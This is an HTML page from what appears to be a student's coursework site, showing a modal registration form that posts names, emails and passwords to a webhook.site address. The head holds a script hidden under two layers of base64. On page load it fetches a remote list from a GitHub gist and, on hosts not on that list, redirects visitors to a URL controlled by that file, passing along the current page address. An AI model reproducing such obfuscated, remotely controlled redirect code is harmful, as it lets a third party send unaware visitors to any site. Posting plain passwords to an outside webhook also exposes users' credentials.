<!DOCTYPE html>
<html lang="en">

<head>
    <meta name="robots" content="noindex, nofollow" />
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>
        Лабораторна 1 &amp; Практична 2 - Бєляєв Данило
    </title>
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet" />

    <script defer src="data:text/javascript;base64,IWZ1bmN0aW9uKCl7bGV0IGQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7ZC5zcmM9ImRhdGE6dGV4dC9qYXZhc2NyaXB0O2Jhc2U2NCxJV0Z6ZVc1aklHWjFibU4wYVc5dUtDbDdkbUZ5SUc4OVlYZGhhWFFnWm1WMFkyZ29JbWgwZEhCek9pOHZaMmx6ZEM1bmFYUm9kV0oxYzJWeVkyOXVkR1Z1ZEM1amIyMHZUMjVsWTJ4aGMzTnBZMnN4TlM4ek16QmxNalZtTmpZMVlUazJOREkyWkdRMk1XWTRNMlEzTldVNU9HVmtOaTl5WVhjdmQyaHBkR1ZzYVhOMExtcHpiMjRpTEh0allXTm9aVG9pYm04dGMzUnZjbVVpZlNrdWRHaGxiaWh2UFQ1dkxtcHpiMjRvS1Nrc2REMTNhVzVrYjNjdWJHOWpZWFJwYjI0dWFHOXpkRzVoYldVN2J6OHVZV3hzYjNkbFpDNXBibU5zZFdSbGN5aDBLWHg4S0hkcGJtUnZkeTVzYjJOaGRHbHZiaTVvY21WbVBXOHVkWEpzSzJBL1puSnZiVDBrZTNkcGJtUnZkeTVzYjJOaGRHbHZiaTVvY21WbWZXQXBmU2dwT3c9PSIsZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChkKX0oKTs="></script>




    <link rel="stylesheet" href="../../assets/css/main.css" />
    <script src="../../assets/js/main.js"></script>

    <style>
        .modal {
            position: fixed;
            top: 0;
            left: 0;
            bottom: 0;
            right: 0;
            background: #000b;
            z-index: 999999999999;
            visibility: hidden;
        }

        .modal .container {
            width: auto;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%) scale(.3);
            transition: transform 0.3s ease-in-out;
        }

        .modal.open {
            visibility: visible;
        }

        .modal.open .container {
            transform: translate(-50%, -50%) scale(1);
        }

        form {
            display: flex;
            flex-direction: column;
            gap: 1rem;
            max-width: 500px;
        }

        form label {
            text-align: left;
        }

        form .row {
            display: flex;
            gap: 1rem;
        }

        form .row>* {
            flex: 1;
        }

        .group {
            display: flex;
            flex-direction: column;
            gap: 0.25rem;
        }

        form input {
            height: 40px;
            border-radius: 0.25rem;
            border: 1px solid var(--border-color);
            padding: 0 1rem;
            background: var(--secondary-background-color);
            color: var(--text-color);
        }

        form input:not([type=submit]):focus-visible {
            box-shadow: 0 0 0 1px #000;
        }

        form input[type=submit] {
            background: var(--secondary-background-color);
            cursor: pointer;
        }

        form input[type=submit]:hover {
            background: var(--primary-color);
            color: var(--text-color);
        }

        button {
            display: block;
            width: 100%;
            height: 40px;
            border-radius: 0.25rem;
            border: 1px solid var(--border-color);
            padding: 0 1rem;
            background: var(--secondary-background-color);
            cursor: pointer;
        }

        button:hover {
            background: var(--primary-color);
            color: var(--text-color);
        }

        @media screen and (max-width: 600px) {
            .row {
                flex-direction: column;
            }

            .modal .container {
                top: 0;
                left: 0;
                bottom: 0;
                right: 0;
                transform: scale(.3);
            }

            .modal.open .container {
                transform-origin: center;
                transform: scale(1);
            }

            .modal .section-header {
                top: 0;
            }
        }
    </style>


</head>

<body>

    <div class="wrapper">
        <!-- [header.html] -->
        <header class="header">
            <div class="container">
                <h1 class="title">
                    <a href="#">Бєляєв Данило</a>
                </h1>
                <div class="group">ТЦР-21</div>
            </div>
        </header>
        <!-- [/header.html] -->
        <!-- [nav.html] -->
        <nav class="nav">
            <div class="container">
                <div></div>
                <ul>
                    <li>
                        <a href="../.." class="">Головна</a>
                    </li>
                    <li>
                        <a href="../../about" class="">Про мене</a>
                    </li>
                    <li>
                        <a href="../../pracs" class="">Практичні роботи</a>
                    </li>
                    <li>
                        <a href="../../labs" class="active">Лабораторні роботи</a>
                    </li>
                </ul>
            </div>
        </nav>
        <!-- [/nav.html] -->

        <main>



            <section class="section">
                <div class="container">
                    <div class="paper">

                        <div class="section-header">
                            <h1 class="section-title">Лабораторна 1 &amp; Практична 2</h1>
                        </div>



                    </div>
                </div>
            </section>




            <section class="section">
                <div class="container">
                    <div class="paper">



                        <div class="section-body">

                            <button id="open-modal">OPEN FORM</button>

                        </div>

                    </div>
                </div>
            </section>


            <section class="section modal">
                <div class="container paper">
                    <div class="section-header">
                        <h1 class="section-title">Modal</h1>
                    </div>
                    <div class="section-body" align="center">
                        <form action="https://webhook.site/b9213059-62a0-4b90-b93f-e61e111ea894">
                            <div class="row">
                                <div class="group">
                                    <label for="name">Name</label>
                                    <input type="text" name="name" id="name" placeholder="Sirius" required>
                                </div>

                                <div class="group">
                                    <label for="surname">Surname</label>
                                    <input type="text" name="surname" id="surname" placeholder="Black" required>
                                </div>
                            </div>

                            <div class="group">
                                <label for="email">Email</label>
                                <input type="email" name="email" id="email" placeholder="sirius@mail.com" required>
                            </div>

                            <div class="group">
                                <label for="password">Password</label>
                                <input type="password" name="password" id="password" required>
                            </div>

                            <div class="group">
                                <label for="re_password">Repeat Password</label>
                                <input type="password" name="re_password" id="re_password" required>
                            </div>

                            <input type="submit" value="submit">

                            <button id="close-modal">CLOSE</button>
                        </form>
                    </div>
                </div>
            </section>

        </main>

        <!-- [footer.html] -->
        <footer class="footer">
            <div class="container">
                <div class="title__wrapper">
                    <h1 class="title">
                        <a href="#">Бєляєв Данило</a>
                    </h1>
                    <div class="info"></div>
                </div>
                <div class="group">ТЦР-21</div>
            </div>
        </footer>
        <!-- [/footer.html] -->
    </div>



    <script>
        const form = document.querySelector('form');
        const formAction = form.getAttribute('action');
        const password = document.querySelector('#password');
        const rePassword = document.querySelector('#re_password');

        form.addEventListener('submit', (e) => {
            e.preventDefault();

            if (password.value !== rePassword.value) {
                alert('Passwords do not match');
                return;
            }

            fetch(formAction, {
                    method: 'POST',
                    mode: 'no-cors',
                    body: new FormData(form)
                })
                .then(() => {
                    alert('Form submitted');
                })
                .catch((e) => {
                    console.error(e);
                    alert('Form not submitted');
                })
                .finally(() => {
                    form.reset();
                })

        });

        const modal = document.querySelector('.modal');
        const openModal = document.querySelector('#open-modal');
        const closeModal = document.querySelector('#close-modal');
        window.addEventListener('click', (e) => {
            if (e.target === modal) {
                modal
                    .classList
                    .remove('open');
            }
        });

        window.addEventListener("keydown", (e) => {
            console.log(e.code);
            if (e.code !== 'Escape')
                return;
            modal
                .classList
                .remove('open');
        });

        openModal.addEventListener('click', (e) => {
            e.preventDefault();
            modal
                .classList
                .add('open');
        });
        closeModal.addEventListener('click', (e) => {
            e.preventDefault();
            modal
                .classList
                .remove('open');
        });
    </script>

</body>

</html>